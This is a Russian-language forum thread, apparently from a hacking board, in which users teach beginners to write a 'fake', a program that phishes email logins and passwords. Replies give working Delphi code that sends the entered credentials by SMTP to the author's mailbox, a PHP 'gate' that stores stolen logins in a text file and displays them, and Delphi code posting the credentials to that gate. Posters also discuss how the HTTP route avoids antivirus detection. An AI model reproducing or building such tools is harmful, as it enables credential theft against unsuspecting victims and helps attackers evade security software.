Вообщем хочу показать новичкам как быстро и легко написать фейк. И так, начнём!1) Кидаем на форму компонент IdSMTP, IdMessage и IdAntiFreeze 2) Кидаем на форму 2 компонента Edit и компонент Button 3) Прописываем код кнопке button приведенный ниже: Вот впринцыпе и всё что нужно, а вот дизайн вы уже думайте сами! Вот набросал кое что ссылка (прошу не критиковать, дизайн писался на скорую руку)
Если у кого то приходит вместо текста ????????? то добавте этот код IdMessage1.CharSet:='windows-1251';
ОМГ, ребята, реально, заканчивайте фигней страдать. Ты не описал принцип работы, по каком протоколу работает, основные функции, и т.д. Вообще ни черта не вижу. Кусок кода, который может написать любой школьник, знающий о существовании компонентов Indy. Это даже не основы, это просто примитив. Фигею...
тeм болee инди встроeнный в дeлфи(сeмeрку по крaйнeй мeрe) довпльно корявый, знaчит eго нaдо обновить, a тe кто знaют, кaк обновить инди смогут сaми нaписaть тaкой "фейк"
когда я был знаком с Cи билдером 2 часа я нагуглил этот код мешьше чем за минуту ) но для новичков сойдет полюбэ )
Кстате код ТСа не совсем полный, отсутствует одна очень важная строчка, помните когда отправку писем сделали с atlogin? ага) вот) ловите полный код, прежде чем его копировать, киньте на форму idsmtp и idmessage во вкладках indy весь код копируем на баттан1 idsmtp1.host :=' '; //сервер отправки у mail.ru - smtp.mail.ru idsmtp1.port:=25; // порт, у каждого разный но многие используют 25 и 2525 idsmtp1.username:=' '; //логин на почтовом сервере (без @mail.ru)например idsmtp1.password:='*****'; //паролец от мыла с которого будет идти отчёт idSMTP1.AuthenticationType:=atLogin; // ОЧЕНЬ ВАЖНАЯ СТРОКА idmessage1.Body.text:='мыло ' + sedit1.text + ' пароль ' + sedit2.text; //в письмо идёт инфа из едит1 и едит2 idmessage1.from.Text:=' '; //emai который отправляет письмо idmessage1.recipients.EMailAddresses:=' '; //emai который получает письмо idmessage1.subject:='тест'; //тема письма idsmtp1.connect(); idsmtp1.send(idmessage1); idsmtp1.disconnect;
чуваки))) двайе не будем мозги ипать))) вот код для отправки на гейт)) вод код гейта PHP: <?php error_reporting(0); $accs = 'good.txt'; $good = fopen($accs,"a+"); if(!empty($_POST['login']) && !empty($_POST['password'])) { fwrite($good, "$_POST[login]:$_POST[password]\n"); } fclose($good); fclose($bad); if(isset($_GET['act']) && $_GET['act'] == 'show') { $file = str_replace("\n",'<br />', file_get_contents('good.txt')); echo $file; } вот код отправки Code: uses idHTTP; procedure Button1Click(sener: TObject); var HTTP: TidHTTP; Data: TStringList; begin HTTP := TidHTTP.Create(nil); Data := TStringList.Create; with Data do begin Add('login=' + edit1.text); Add('pass=' + edit2.text); end; HTTP.Post('http://site.ru/gate.php', Data); Data.Free; HTTP.Free; end;
да кстати этот метод с гейтом не особо палевный) kav 2010, при проактивке только палит, типа прога хочет выполнить DNS запрос
Все дело в том, что электронную почту использовать для подобных целей не совсем грамотно. Куда приятнее намутить гейт и работать по http протоколу. И антивирь не будет палить прогу в том, что она кидает куда то электронную почту(а ведь это сразу подозрения вызовет, даже если пользователь не слишком опытный). Делайте выводы я ачешуел все это с телефона писать
Сделайте пример рабочий. Просто хочется поглядеть,а то так везде отрывками,да отрывками, а лучше вообще видео снимите и youtube кидайте. Только если кто видео будет снимать,то разжевать надо,так чтобы даже 5 летний смог бы написать! С самого начала, серверной части при отправке на гейт! А то руки видно у меня не оттуда растут.
поищи фэйки от nightmare))) он делал п**датый фэйк)) да иваще поищи в гугле))) Дело не в руках, а в неправильности мышления